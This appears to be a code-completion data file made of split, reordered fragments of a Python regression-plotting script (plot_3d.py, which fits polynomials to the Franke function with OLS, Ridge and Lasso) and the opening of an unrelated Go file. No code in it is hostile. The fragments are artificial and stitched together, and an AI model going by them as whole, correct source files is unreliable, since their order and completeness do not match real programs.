outfile='beta_all_multi_lamb_'+model+fig_format
plt.savefig('figs/'+outfile, bbox_inches='tight', pad_inches=0.1)
plt.clf()
return
else:
plt.xlabel(r'Split number',fontsize=14)
m_str,pow_str=get_pow_str(b_mean,3)
if (nb > -1):
if (btype=='var'):
plt.ylabel(r'Var[$\beta_{%i}$]'%(nb),fontsize=14)
lab_m=r'E[Var[$\beta_{%i}$]]'%(nb)
else:
plt.ylabel(r'$\beta_{%i}$'%(nb),fontsize=14)
lab_m=r'E[$\beta_{%i}$]'%(nb)
if (plt_val):
lab_m+=r' = %s $\cdot$ $10^{%s}$'%(m_str,pow_str)
else:
if (btype=='var'):
plt.ylabel(r'Var[$\beta$]',fontsize=14)
lab_m=r'E[Var[$\beta$]]'
else:
plt.ylabel(r'$\beta$',fontsize=14)
lab_m=r'E[$\beta$]'
if (plt_val):
lab_m+=r' = %s $\cdot$ $10^{%s}$'%(m_str,pow_str)
std_str,pow_str=get_pow_str(cal_std,3)
lab_std=''+r'$\sigma$'
if (plt_val):
lab_std+=r' = %s $\cdot$ $10^{%s}$'%(std_str,pow_str)
b_m=np.array([b_mean,b_mean])
bc_std=np.array([[b_mean-cal_std,b_mean-cal_std],[b_mean+cal_std,b_mean+cal_std]])
if (eq_std[0] > 0.0):
be_std=np.array([[b_mean-eq_std,b_mean-eq_std],[b_mean+eq_std,b_mean+eq_std]])
std_str,pow_str=get_pow_str(eq_std,3)
lab_std_eq=''+r'$\sigma_{\mathrm{eq}}$'
if (plt_val):
lab_std_eq+=r' = %s $\cdot$ $10^{%s}$'%(std_str,pow_str)
xplt=np.arange(1,nplt+0.5,dtype=np.int64)
mplt=[1,nplt]
if (not btype=='all'):
plt.plot(xplt,beta,ls='none',marker='.',color=cols[0])
plt.plot(mplt,b_m,color=cols[1],label=lab_m)
minmax=np.zeros(2)
minmax[0]=np.amin(beta)
minmax[1]=np.amax(beta)
db=minmax[1]-minmax[0]
minmax[0]-=db*0.05
minmax[1]+=db*0.2
plt.ylim(minmax)
plt.plot(mplt,bc_std[0,:],color=cols[2],label=lab_std)
else:
plt.plot(xplt,beta,marker='.',color=cols[0])
plt.plot(mplt,bc_std[0,:],color=cols[2])
plt.plot(mplt,bc_std[1,:],color=cols[2])
if (eq_std[0] > 0.0):
plt.plot(mplt,be_std[0,:],color=cols[3],label=lab_std_eq)
plt.plot(mplt,be_std[1,:],color=cols[3])
if (not btype=='all'):
plt.legend(loc='upper right')
#plt.show()
if (btype=='beta'):
outfile='beta'
elif (btype=='var'):
outfile='beta_var'
elif (btype=='all'):
outfile='beta_all'
if (model=='ols'):
outfile+='_ols'
if (deg > -1):
outfile+='_deg%i'%(deg)
if (model=='ridge'):
outfile+='_ridge_lamb%.1e'%(lamb)
if (model=='lasso'):
outfile+='_lasso_lamb%.1e'%(lamb)
else:
outfile='beta_check'
if (n>0):
outfile+='_grid%i'%(n)
if (not btype=='all'):
if (lamb>0.0):
outfile+='_lamb_%.1e'%(lamb)
if ((not btype=='all') and nb > -1):
outfile+='_n%02d'%(nb)
if (plt_title):
if (btype=='beta'):
plt.title(r'Scatterplot of $\beta_{%i}$'%(nb))
elif (btype=='beta_var'):
plt.title(r'Scatterplot of Var[$\beta_{%i}$]'%(nb))
if (eq_std[0] > 0.0):
outfile+='_eq_comp'
if (diff_noise):
outfile+='_diff_noise'
if (var_mse):
outfile+='_varMSE'
outfile+=fig_format
plt.savefig('figs/'+outfile)
plt.clf()
def get_pow_str(in_val,l):
v='%.10e'%(in_val)
a=v.split('e')
v=a[0]
v=v[:2+l]
s=a[1]
if (s[1]=='0'):
s=s[0]+s[2]
if (s[0]=='+'):
s=s[1:]
return v,s |
x = np.arange(0, 1.0001, 1.0/(n-1))
y = np.arange(0, 1.0001, 1.0/(n-1))
x, y = np.meshgrid(x,y) | random_line_split |
plot_3d.py |
from mpl_toolkits.mplot3d import Axes3D
from setup_matplotlib import *
from matplotlib import cm
from matplotlib.ticker import LinearLocator, FormatStrFormatter
import numpy as np
from sklearn import linear_model
#from random import random, seed
import time
from params import *
from linreg_functions import *
def plot_3D(n,lamb=[0.0],rand=False,var_check=False,diff_noise=False,exit_early=True,var_mse=False):
# Make data.
n2=n**2
np.random.seed(seed)
x = np.arange(0, 1.0001, 1.0/(n-1))
y = np.arange(0, 1.0001, 1.0/(n-1))
x, y = np.meshgrid(x,y)
z0 = FrankeFunction(x, y)
if (verbosity>0):
print('')
print('#############################################')
print('')
if (not (var_check and diff_noise)):
if (sigma>0.0):
noise=np.random.normal(0.0,sigma,size=(n,n))
z=z0+noise
else:
z=z0
xv,yv,fv=init_xy_vectors(n,rand,rearr=True,x=x,y=y,z=z)
if (var_check): #check the variance terms of beta vs. the equation from lecture notes
# Var[beta_j]=sigma^2 * ((X.T@X)^-1)_jj
if (verbosity>0):
print('Variance check, lambda %.2e'%lamb[0])
if (diff_noise):
#add different noise for each split. Requires no noise in base data
fv0=np.copy(fv)
deg=5
n_p=(deg+1)*(deg+2)//2
k=4
m=100 #100 different splits
beta_mean=np.zeros(n_p)
betas=np.zeros(shape=(n_p,m*k))
bvs=np.zeros(shape=(n_p,m*k))
bv_calc=np.zeros(n_p)
bv_std=np.zeros(n_p)
bv_sum=np.zeros(n_p)
for i in range(m):
if (verbosity>1):
print('split number %i of %i'%(i,m))
if (diff_noise):#add different noise for each split. Requires no noise in base data
fv = fv0 + np.random.normal(0.0,sigma,size=(n**2,1))
xk,yk,fk,nk=split_data_kfold(xv,yv,fv,k)
mse,r2,betak,bv=polfit_kfold(xk,yk,fk,nk,k,n2,deg=5,lamb=lamb[0],var_mse=var_mse)
#get all beta values and estimated variances from all k-fold fits
betas[:,i*k:(i+1)*k]=betak*1.0
bvs[:,i*k:(i+1)*k]=bv*1.0
bv_sum+=np.mean(bv,axis=1) #get the mean of the estimated var
beta_mean=np.mean(betas,axis=1)
bv_mean=bv_sum/m
be_std=np.sqrt(bv_mean)
for i in range(m*k):
for j in range(n_p):
bv_calc[j]+=(betas[j,i]-beta_mean[j])**2
bv_std[j]+=(bvs[j,i]-bv_mean[j])**2
bv_calc=bv_calc/(m*k)
bv_std=np.sqrt(bv_std/(m*k))
b_std=np.sqrt(bv_calc)
if (verbosity > 0):
print('')
print('Plotting betas')
for i in range(n_p):
if (verbosity>1):
print('beta %i: calc_var = %10.5f , eq_var = %10.5f'%(i,bv_calc[i],bv_mean[i]))
plot_betas(betas[i,:],cal_std=b_std[i],b_mean=beta_mean[i],eq_std=np.array([be_std[i]]),nb=i,lamb=lamb[0],n=n,btype='beta',plt_title=False,plt_val=True,diff_noise=diff_noise,var_mse=var_mse)
plot_betas(bvs[i,:],cal_std=bv_std[i],b_mean=bv_mean[i],nb=i,lamb=lamb[0],n=n,btype='var',plt_title=False,plt_val=True,diff_noise=diff_noise,var_mse=var_mse)
if (exit_early):
return
#Plot the surface without noise
if (verbosity>0):
print('Plotting Franke function without noise')
plot_surf(x,y,z0,colbar=True)
plot_surf(x,y,z0,plt_title=True)
if (var_check and diff_noise):
if (sigma>0.0):
noise=np.random.normal(0.0,sigma,size=(n,n))
z=z0+noise
#Plot the surface
if (verbosity>0):
print('Plotting Franke function with noise')
plot_surf(x,y,z,noise=True)
plot_surf(x,y,z,noise=True,colbar=True)
# Do a 4-fold CV using OLS and complexities ranging from 0 to 5th polynomial
k=4
xk,yk,fk,nk=split_data_kfold(xv,yv,fv,k)
for deg in range(6):
if (verbosity>0):
print('Plotting OLS, polynomial degree %i'%deg)
mse,r2,betak,bv=polfit_kfold(xk,yk,fk,nk,k,n2,deg=deg,lamb=0.0)
beta=np.mean(betak,axis=1)
beta_std=np.sqrt(np.mean(bv,axis=1))
zfit=eval_pol3D(beta,x,y,deg)
plot_surf(x,y,z,zfit=zfit,model='ols',deg=deg,lamb=1e-4,noise=True)
plot_betas(beta,cal_std=beta_std,n=n,model='ols',deg=deg,btype='all')
#Do a Ridge regression for chosen lambda values for 5th degree polynomial fit
lamb=[1.0,1e-2,1e-4,1e-6]
beta_l=np.zeros(shape=(21,6))
beta_l[:,0]=beta
deg=5
for i in range(len(lamb)):
if (verbosity>0):
print('Plotting Ridge, lambda %.2e'%lamb[i])
mse,r2,betak,bv=polfit_kfold(xk,yk,fk,nk,k,n2,deg=deg,lamb=lamb[i])
beta=np.mean(betak,axis=1)
beta_std=np.sqrt(np.mean(bv,axis=1))
zfit=eval_pol3D(beta,x,y,deg)
beta_l[:,i+1]=beta
plot_surf(x,y,z,zfit=zfit,model='ridge',deg=deg,lamb=lamb[i],noise=True)
plot_betas(beta,cal_std=beta_std,n=n,model='ridge',lamb=lamb[i],btype='all')
plot_betas(beta_l,lamb=lamb,model='ridge',plt_lamb=True)
#Do a Lasso regression for chosen lambda values for 5th degree polynomial fit
lamb=[1.0,1e-2,1e-4,1e-6]
for i in range(len(lamb)):
if (verbosity>0):
print('Plotting Lasso, lambda %.2e'%lamb[i])
mse,r2,betak=kfold_CV_lasso(xk,yk,fk,nk,k,n2,deg=deg,lamb=lamb[i])
beta=np.mean(betak,axis=1)
beta_l[:,i+1]=beta
zfit=eval_pol3D(beta,x,y,deg)
plot_surf(x,y,z,zfit=zfit,model='lasso',deg=deg,lamb=lamb[i],noise=True)
plot_betas(beta,n=n,model='lasso',lamb=lamb[i],btype='all')
plot_betas(beta_l,lamb=lamb,model='lasso',plt_lamb=True)
return
def plot_surf(x,y,z,zfit=0.0,model='none',deg=-1,lamb=0.0,noise=False,colbar=False,plt_title=False):
# Plot the surface.
global fig_format
fig = plt.figure(1)
ax = fig.gca(projection='3d')
surf = ax.plot_surface(x, y, z, cmap=cm.coolwarm,linewidth=0, antialiased=False, alpha=0.6)
if (not model=='none'):
ax.scatter(x,y,zfit,marker='.',s=1.,color='r')
# Customize the z axis.
ax.set_zlim(-0.10, 1.40)
ax.zaxis.set_major_locator(LinearLocator(10))
ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f'))
ax.view_init(elev=10., azim=65.)
# Add a color bar which maps values to colors.
if (colbar):
fig.colorbar(surf, shrink=0.5, aspect=5)
if (lamb==0.0):
lamb_str='0'
else:
lamb_str='%.2e'%(lamb)
a=lamb_str.split('e')
power=a[1]
lamb_str=a[0]
if (power[0]=='-'):
sign='-'
else:
sign=''
power=power[1:]
if (power[0]=='0'):
power=power[1:]
plt.xlabel('x',fontsize=14)
plt.ylabel('y',fontsize=14,labelpad=10)
plt.yticks(rotation=45)
if (model=='none'):
|
elif (model=='ols'):
if (plt_title):
plt.title(r'OLS, $p=$ %i'%(deg))
filename='ols'
if (noise):
filename+='_noise'
if (colbar):
filename+='_cbar'
filename+='_p%i'%(deg)+fig_format
elif (model=='ridge'):
if (plt_title):
plt.title(r'Ridge, $\lambda = %s \cdot 10^{%s}$'%(lamb_str,sign+power))
filename='ridge'
if (noise):
filename+='_noise'
if (colbar):
filename+='_cbar'
filename+='_lamb_%.2e'%(lamb)+fig_format
elif (model=='lasso'):
if (plt_title):
plt.title(r'Lasso, $\lambda = %s \cdot 10^{%s}$'%(lamb_str,sign+power))
filename='lasso'
if (noise):
filename+='_noise'
if (colbar):
filename+='_cbar'
filename+='_lamb_%.2e'%(lamb)+fig_format
else:
plt.clf()
return
if (debug):
plt.show()
plt.savefig('figs/'+filename, bbox_inches='tight', pad_inches=0.1)
plt.clf()
return
def plot_betas(beta,cal_std=0.0,b_mean=0.0,nb=-1,n=-1,eq_std=[-1.0],model='none',btype='none',ci=1.96,plt_title=False,plt_val=False,diff_noise=False,lamb=-1.0,var_mse=False,deg=-1,plt_lamb=False):
ci_cal=cal_std*ci
if (eq_std[0] > 0.0):
ci_eq=eq_std*ci
nplt=len(beta)
plt.figure(1)
cols=plt.rcParams['axes.prop_cycle'].by_key()['color']
if (btype=='all'):
plt.xlabel(r'Index $i$',fontsize=14)
plt.ylabel(r'$\beta$',fontsize=14)
bc_std=np.zeros(shape=(2,nplt))
bc_std[0,:]=beta-ci_cal
bc_std[1,:]=beta+ci_cal
if (eq_std[0] > 0.0):
be_std=np.array(shape=(2,nplt))
be_std[0,:]=beta-ci_eq
be_std[1,:]=beta+ci_eq
xplt=np.arange(0,nplt,dtype=np.int64)
mplt=xplt
elif (plt_lamb):
plt.xlabel(r'Index $i$',fontsize=14)
plt.ylabel(r'$\beta$',fontsize=14)
for i in range(len(lamb)+1):
if (i == 0):
lab='OLS'
else:
lamb_str,pow_str=get_pow_str(lamb[i-1],1)
lab=r'$\lambda=$ %s$\,\cdot 10^{%s}$'%(lamb_str,pow_str)
plt.plot(np.arange(0,21,dtype='int'),beta[:,i],label=lab,marker='.',ls='-')
plt.legend(loc='lower right')
outfile='beta_all_multi_lamb_'+model+fig_format
plt.savefig('figs/'+outfile, bbox_inches='tight', pad_inches=0.1)
plt.clf()
return
else:
plt.xlabel(r'Split number',fontsize=14)
m_str,pow_str=get_pow_str(b_mean,3)
if (nb > -1):
if (btype=='var'):
plt.ylabel(r'Var[$\beta_{%i}$]'%(nb),fontsize=14)
lab_m=r'E[Var[$\beta_{%i}$]]'%(nb)
else:
plt.ylabel(r'$\beta_{%i}$'%(nb),fontsize=14)
lab_m=r'E[$\beta_{%i}$]'%(nb)
if (plt_val):
lab_m+=r' = %s $\cdot$ $10^{%s}$'%(m_str,pow_str)
else:
if (btype=='var'):
plt.ylabel(r'Var[$\beta$]',fontsize=14)
lab_m=r'E[Var[$\beta$]]'
else:
plt.ylabel(r'$\beta$',fontsize=14)
lab_m=r'E[$\beta$]'
if (plt_val):
lab_m+=r' = %s $\cdot$ $10^{%s}$'%(m_str,pow_str)
std_str,pow_str=get_pow_str(cal_std,3)
lab_std=''+r'$\sigma$'
if (plt_val):
lab_std+=r' = %s $\cdot$ $10^{%s}$'%(std_str,pow_str)
b_m=np.array([b_mean,b_mean])
bc_std=np.array([[b_mean-cal_std,b_mean-cal_std],[b_mean+cal_std,b_mean+cal_std]])
if (eq_std[0] > 0.0):
be_std=np.array([[b_mean-eq_std,b_mean-eq_std],[b_mean+eq_std,b_mean+eq_std]])
std_str,pow_str=get_pow_str(eq_std,3)
lab_std_eq=''+r'$\sigma_{\mathrm{eq}}$'
if (plt_val):
lab_std_eq+=r' = %s $\cdot$ $10^{%s}$'%(std_str,pow_str)
xplt=np.arange(1,nplt+0.5,dtype=np.int64)
mplt=[1,nplt]
if (not btype=='all'):
plt.plot(xplt,beta,ls='none',marker='.',color=cols[0])
plt.plot(mplt,b_m,color=cols[1],label=lab_m)
minmax=np.zeros(2)
minmax[0]=np.amin(beta)
minmax[1]=np.amax(beta)
db=minmax[1]-minmax[0]
minmax[0]-=db*0.05
minmax[1]+=db*0.2
plt.ylim(minmax)
plt.plot(mplt,bc_std[0,:],color=cols[2],label=lab_std)
else:
plt.plot(xplt,beta,marker='.',color=cols[0])
plt.plot(mplt,bc_std[0,:],color=cols[2])
plt.plot(mplt,bc_std[1,:],color=cols[2])
if (eq_std[0] > 0.0):
plt.plot(mplt,be_std[0,:],color=cols[3],label=lab_std_eq)
plt.plot(mplt,be_std[1,:],color=cols[3])
if (not btype=='all'):
plt.legend(loc='upper right')
#plt.show()
if (btype=='beta'):
outfile='beta'
elif (btype=='var'):
outfile='beta_var'
elif (btype=='all'):
outfile='beta_all'
if (model=='ols'):
outfile+='_ols'
if (deg > -1):
outfile+='_deg%i'%(deg)
if (model=='ridge'):
outfile+='_ridge_lamb%.1e'%(lamb)
if (model=='lasso'):
outfile+='_lasso_lamb%.1e'%(lamb)
else:
outfile='beta_check'
if (n>0):
outfile+='_grid%i'%(n)
if (not btype=='all'):
if (lamb>0.0):
outfile+='_lamb_%.1e'%(lamb)
if ((not btype=='all') and nb > -1):
outfile+='_n%02d'%(nb)
if (plt_title):
if (btype=='beta'):
plt.title(r'Scatterplot of $\beta_{%i}$'%(nb))
elif (btype=='beta_var'):
plt.title(r'Scatterplot of Var[$\beta_{%i}$]'%(nb))
if (eq_std[0] > 0.0):
outfile+='_eq_comp'
if (diff_noise):
outfile+='_diff_noise'
if (var_mse):
outfile+='_varMSE'
outfile+=fig_format
plt.savefig('figs/'+outfile)
plt.clf()
def get_pow_str(in_val,l):
v='%.10e'%(in_val)
a=v.split('e')
v=a[0]
v=v[:2+l]
s=a[1]
if (s[1]=='0'):
s=s[0]+s[2]
if (s[0]=='+'):
s=s[1:]
return v,s
| if (plt_title):
plt.title('Franke function')
filename='franke_function'
if (noise):
filename+='_noise'
if (colbar):
filename+='_cbar'
filename+=fig_format | conditional_block |
plot_3d.py |
from mpl_toolkits.mplot3d import Axes3D
from setup_matplotlib import *
from matplotlib import cm
from matplotlib.ticker import LinearLocator, FormatStrFormatter
import numpy as np
from sklearn import linear_model
#from random import random, seed
import time
from params import *
from linreg_functions import *
def plot_3D(n,lamb=[0.0],rand=False,var_check=False,diff_noise=False,exit_early=True,var_mse=False):
# Make data.
|
def plot_surf(x,y,z,zfit=0.0,model='none',deg=-1,lamb=0.0,noise=False,colbar=False,plt_title=False):
# Plot the surface.
global fig_format
fig = plt.figure(1)
ax = fig.gca(projection='3d')
surf = ax.plot_surface(x, y, z, cmap=cm.coolwarm,linewidth=0, antialiased=False, alpha=0.6)
if (not model=='none'):
ax.scatter(x,y,zfit,marker='.',s=1.,color='r')
# Customize the z axis.
ax.set_zlim(-0.10, 1.40)
ax.zaxis.set_major_locator(LinearLocator(10))
ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f'))
ax.view_init(elev=10., azim=65.)
# Add a color bar which maps values to colors.
if (colbar):
fig.colorbar(surf, shrink=0.5, aspect=5)
if (lamb==0.0):
lamb_str='0'
else:
lamb_str='%.2e'%(lamb)
a=lamb_str.split('e')
power=a[1]
lamb_str=a[0]
if (power[0]=='-'):
sign='-'
else:
sign=''
power=power[1:]
if (power[0]=='0'):
power=power[1:]
plt.xlabel('x',fontsize=14)
plt.ylabel('y',fontsize=14,labelpad=10)
plt.yticks(rotation=45)
if (model=='none'):
if (plt_title):
plt.title('Franke function')
filename='franke_function'
if (noise):
filename+='_noise'
if (colbar):
filename+='_cbar'
filename+=fig_format
elif (model=='ols'):
if (plt_title):
plt.title(r'OLS, $p=$ %i'%(deg))
filename='ols'
if (noise):
filename+='_noise'
if (colbar):
filename+='_cbar'
filename+='_p%i'%(deg)+fig_format
elif (model=='ridge'):
if (plt_title):
plt.title(r'Ridge, $\lambda = %s \cdot 10^{%s}$'%(lamb_str,sign+power))
filename='ridge'
if (noise):
filename+='_noise'
if (colbar):
filename+='_cbar'
filename+='_lamb_%.2e'%(lamb)+fig_format
elif (model=='lasso'):
if (plt_title):
plt.title(r'Lasso, $\lambda = %s \cdot 10^{%s}$'%(lamb_str,sign+power))
filename='lasso'
if (noise):
filename+='_noise'
if (colbar):
filename+='_cbar'
filename+='_lamb_%.2e'%(lamb)+fig_format
else:
plt.clf()
return
if (debug):
plt.show()
plt.savefig('figs/'+filename, bbox_inches='tight', pad_inches=0.1)
plt.clf()
return
def plot_betas(beta,cal_std=0.0,b_mean=0.0,nb=-1,n=-1,eq_std=[-1.0],model='none',btype='none',ci=1.96,plt_title=False,plt_val=False,diff_noise=False,lamb=-1.0,var_mse=False,deg=-1,plt_lamb=False):
ci_cal=cal_std*ci
if (eq_std[0] > 0.0):
ci_eq=eq_std*ci
nplt=len(beta)
plt.figure(1)
cols=plt.rcParams['axes.prop_cycle'].by_key()['color']
if (btype=='all'):
plt.xlabel(r'Index $i$',fontsize=14)
plt.ylabel(r'$\beta$',fontsize=14)
bc_std=np.zeros(shape=(2,nplt))
bc_std[0,:]=beta-ci_cal
bc_std[1,:]=beta+ci_cal
if (eq_std[0] > 0.0):
be_std=np.array(shape=(2,nplt))
be_std[0,:]=beta-ci_eq
be_std[1,:]=beta+ci_eq
xplt=np.arange(0,nplt,dtype=np.int64)
mplt=xplt
elif (plt_lamb):
plt.xlabel(r'Index $i$',fontsize=14)
plt.ylabel(r'$\beta$',fontsize=14)
for i in range(len(lamb)+1):
if (i == 0):
lab='OLS'
else:
lamb_str,pow_str=get_pow_str(lamb[i-1],1)
lab=r'$\lambda=$ %s$\,\cdot 10^{%s}$'%(lamb_str,pow_str)
plt.plot(np.arange(0,21,dtype='int'),beta[:,i],label=lab,marker='.',ls='-')
plt.legend(loc='lower right')
outfile='beta_all_multi_lamb_'+model+fig_format
plt.savefig('figs/'+outfile, bbox_inches='tight', pad_inches=0.1)
plt.clf()
return
else:
plt.xlabel(r'Split number',fontsize=14)
m_str,pow_str=get_pow_str(b_mean,3)
if (nb > -1):
if (btype=='var'):
plt.ylabel(r'Var[$\beta_{%i}$]'%(nb),fontsize=14)
lab_m=r'E[Var[$\beta_{%i}$]]'%(nb)
else:
plt.ylabel(r'$\beta_{%i}$'%(nb),fontsize=14)
lab_m=r'E[$\beta_{%i}$]'%(nb)
if (plt_val):
lab_m+=r' = %s $\cdot$ $10^{%s}$'%(m_str,pow_str)
else:
if (btype=='var'):
plt.ylabel(r'Var[$\beta$]',fontsize=14)
lab_m=r'E[Var[$\beta$]]'
else:
plt.ylabel(r'$\beta$',fontsize=14)
lab_m=r'E[$\beta$]'
if (plt_val):
lab_m+=r' = %s $\cdot$ $10^{%s}$'%(m_str,pow_str)
std_str,pow_str=get_pow_str(cal_std,3)
lab_std=''+r'$\sigma$'
if (plt_val):
lab_std+=r' = %s $\cdot$ $10^{%s}$'%(std_str,pow_str)
b_m=np.array([b_mean,b_mean])
bc_std=np.array([[b_mean-cal_std,b_mean-cal_std],[b_mean+cal_std,b_mean+cal_std]])
if (eq_std[0] > 0.0):
be_std=np.array([[b_mean-eq_std,b_mean-eq_std],[b_mean+eq_std,b_mean+eq_std]])
std_str,pow_str=get_pow_str(eq_std,3)
lab_std_eq=''+r'$\sigma_{\mathrm{eq}}$'
if (plt_val):
lab_std_eq+=r' = %s $\cdot$ $10^{%s}$'%(std_str,pow_str)
xplt=np.arange(1,nplt+0.5,dtype=np.int64)
mplt=[1,nplt]
if (not btype=='all'):
plt.plot(xplt,beta,ls='none',marker='.',color=cols[0])
plt.plot(mplt,b_m,color=cols[1],label=lab_m)
minmax=np.zeros(2)
minmax[0]=np.amin(beta)
minmax[1]=np.amax(beta)
db=minmax[1]-minmax[0]
minmax[0]-=db*0.05
minmax[1]+=db*0.2
plt.ylim(minmax)
plt.plot(mplt,bc_std[0,:],color=cols[2],label=lab_std)
else:
plt.plot(xplt,beta,marker='.',color=cols[0])
plt.plot(mplt,bc_std[0,:],color=cols[2])
plt.plot(mplt,bc_std[1,:],color=cols[2])
if (eq_std[0] > 0.0):
plt.plot(mplt,be_std[0,:],color=cols[3],label=lab_std_eq)
plt.plot(mplt,be_std[1,:],color=cols[3])
if (not btype=='all'):
plt.legend(loc='upper right')
#plt.show()
if (btype=='beta'):
outfile='beta'
elif (btype=='var'):
outfile='beta_var'
elif (btype=='all'):
outfile='beta_all'
if (model=='ols'):
outfile+='_ols'
if (deg > -1):
outfile+='_deg%i'%(deg)
if (model=='ridge'):
outfile+='_ridge_lamb%.1e'%(lamb)
if (model=='lasso'):
outfile+='_lasso_lamb%.1e'%(lamb)
else:
outfile='beta_check'
if (n>0):
outfile+='_grid%i'%(n)
if (not btype=='all'):
if (lamb>0.0):
outfile+='_lamb_%.1e'%(lamb)
if ((not btype=='all') and nb > -1):
outfile+='_n%02d'%(nb)
if (plt_title):
if (btype=='beta'):
plt.title(r'Scatterplot of $\beta_{%i}$'%(nb))
elif (btype=='beta_var'):
plt.title(r'Scatterplot of Var[$\beta_{%i}$]'%(nb))
if (eq_std[0] > 0.0):
outfile+='_eq_comp'
if (diff_noise):
outfile+='_diff_noise'
if (var_mse):
outfile+='_varMSE'
outfile+=fig_format
plt.savefig('figs/'+outfile)
plt.clf()
def get_pow_str(in_val,l):
v='%.10e'%(in_val)
a=v.split('e')
v=a[0]
v=v[:2+l]
s=a[1]
if (s[1]=='0'):
s=s[0]+s[2]
if (s[0]=='+'):
s=s[1:]
return v,s
| n2=n**2
np.random.seed(seed)
x = np.arange(0, 1.0001, 1.0/(n-1))
y = np.arange(0, 1.0001, 1.0/(n-1))
x, y = np.meshgrid(x,y)
z0 = FrankeFunction(x, y)
if (verbosity>0):
print('')
print('#############################################')
print('')
if (not (var_check and diff_noise)):
if (sigma>0.0):
noise=np.random.normal(0.0,sigma,size=(n,n))
z=z0+noise
else:
z=z0
xv,yv,fv=init_xy_vectors(n,rand,rearr=True,x=x,y=y,z=z)
if (var_check): #check the variance terms of beta vs. the equation from lecture notes
# Var[beta_j]=sigma^2 * ((X.T@X)^-1)_jj
if (verbosity>0):
print('Variance check, lambda %.2e'%lamb[0])
if (diff_noise):
#add different noise for each split. Requires no noise in base data
fv0=np.copy(fv)
deg=5
n_p=(deg+1)*(deg+2)//2
k=4
m=100 #100 different splits
beta_mean=np.zeros(n_p)
betas=np.zeros(shape=(n_p,m*k))
bvs=np.zeros(shape=(n_p,m*k))
bv_calc=np.zeros(n_p)
bv_std=np.zeros(n_p)
bv_sum=np.zeros(n_p)
for i in range(m):
if (verbosity>1):
print('split number %i of %i'%(i,m))
if (diff_noise):#add different noise for each split. Requires no noise in base data
fv = fv0 + np.random.normal(0.0,sigma,size=(n**2,1))
xk,yk,fk,nk=split_data_kfold(xv,yv,fv,k)
mse,r2,betak,bv=polfit_kfold(xk,yk,fk,nk,k,n2,deg=5,lamb=lamb[0],var_mse=var_mse)
#get all beta values and estimated variances from all k-fold fits
betas[:,i*k:(i+1)*k]=betak*1.0
bvs[:,i*k:(i+1)*k]=bv*1.0
bv_sum+=np.mean(bv,axis=1) #get the mean of the estimated var
beta_mean=np.mean(betas,axis=1)
bv_mean=bv_sum/m
be_std=np.sqrt(bv_mean)
for i in range(m*k):
for j in range(n_p):
bv_calc[j]+=(betas[j,i]-beta_mean[j])**2
bv_std[j]+=(bvs[j,i]-bv_mean[j])**2
bv_calc=bv_calc/(m*k)
bv_std=np.sqrt(bv_std/(m*k))
b_std=np.sqrt(bv_calc)
if (verbosity > 0):
print('')
print('Plotting betas')
for i in range(n_p):
if (verbosity>1):
print('beta %i: calc_var = %10.5f , eq_var = %10.5f'%(i,bv_calc[i],bv_mean[i]))
plot_betas(betas[i,:],cal_std=b_std[i],b_mean=beta_mean[i],eq_std=np.array([be_std[i]]),nb=i,lamb=lamb[0],n=n,btype='beta',plt_title=False,plt_val=True,diff_noise=diff_noise,var_mse=var_mse)
plot_betas(bvs[i,:],cal_std=bv_std[i],b_mean=bv_mean[i],nb=i,lamb=lamb[0],n=n,btype='var',plt_title=False,plt_val=True,diff_noise=diff_noise,var_mse=var_mse)
if (exit_early):
return
#Plot the surface without noise
if (verbosity>0):
print('Plotting Franke function without noise')
plot_surf(x,y,z0,colbar=True)
plot_surf(x,y,z0,plt_title=True)
if (var_check and diff_noise):
if (sigma>0.0):
noise=np.random.normal(0.0,sigma,size=(n,n))
z=z0+noise
#Plot the surface
if (verbosity>0):
print('Plotting Franke function with noise')
plot_surf(x,y,z,noise=True)
plot_surf(x,y,z,noise=True,colbar=True)
# Do a 4-fold CV using OLS and complexities ranging from 0 to 5th polynomial
k=4
xk,yk,fk,nk=split_data_kfold(xv,yv,fv,k)
for deg in range(6):
if (verbosity>0):
print('Plotting OLS, polynomial degree %i'%deg)
mse,r2,betak,bv=polfit_kfold(xk,yk,fk,nk,k,n2,deg=deg,lamb=0.0)
beta=np.mean(betak,axis=1)
beta_std=np.sqrt(np.mean(bv,axis=1))
zfit=eval_pol3D(beta,x,y,deg)
plot_surf(x,y,z,zfit=zfit,model='ols',deg=deg,lamb=1e-4,noise=True)
plot_betas(beta,cal_std=beta_std,n=n,model='ols',deg=deg,btype='all')
#Do a Ridge regression for chosen lambda values for 5th degree polynomial fit
lamb=[1.0,1e-2,1e-4,1e-6]
beta_l=np.zeros(shape=(21,6))
beta_l[:,0]=beta
deg=5
for i in range(len(lamb)):
if (verbosity>0):
print('Plotting Ridge, lambda %.2e'%lamb[i])
mse,r2,betak,bv=polfit_kfold(xk,yk,fk,nk,k,n2,deg=deg,lamb=lamb[i])
beta=np.mean(betak,axis=1)
beta_std=np.sqrt(np.mean(bv,axis=1))
zfit=eval_pol3D(beta,x,y,deg)
beta_l[:,i+1]=beta
plot_surf(x,y,z,zfit=zfit,model='ridge',deg=deg,lamb=lamb[i],noise=True)
plot_betas(beta,cal_std=beta_std,n=n,model='ridge',lamb=lamb[i],btype='all')
plot_betas(beta_l,lamb=lamb,model='ridge',plt_lamb=True)
#Do a Lasso regression for chosen lambda values for 5th degree polynomial fit
lamb=[1.0,1e-2,1e-4,1e-6]
for i in range(len(lamb)):
if (verbosity>0):
print('Plotting Lasso, lambda %.2e'%lamb[i])
mse,r2,betak=kfold_CV_lasso(xk,yk,fk,nk,k,n2,deg=deg,lamb=lamb[i])
beta=np.mean(betak,axis=1)
beta_l[:,i+1]=beta
zfit=eval_pol3D(beta,x,y,deg)
plot_surf(x,y,z,zfit=zfit,model='lasso',deg=deg,lamb=lamb[i],noise=True)
plot_betas(beta,n=n,model='lasso',lamb=lamb[i],btype='all')
plot_betas(beta_l,lamb=lamb,model='lasso',plt_lamb=True)
return | identifier_body |
daemon.go | /*
Copyright (C) 2018 Yahoo Japan Corporation Athenz team.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package policy
import (
"context"
"encoding/json"
"fmt"
"io"
"io/ioutil"
"net/http"
"strings"
"sync"
"time"
"github.com/kpango/gache"
"github.com/kpango/glg"
"github.com/pkg/errors"
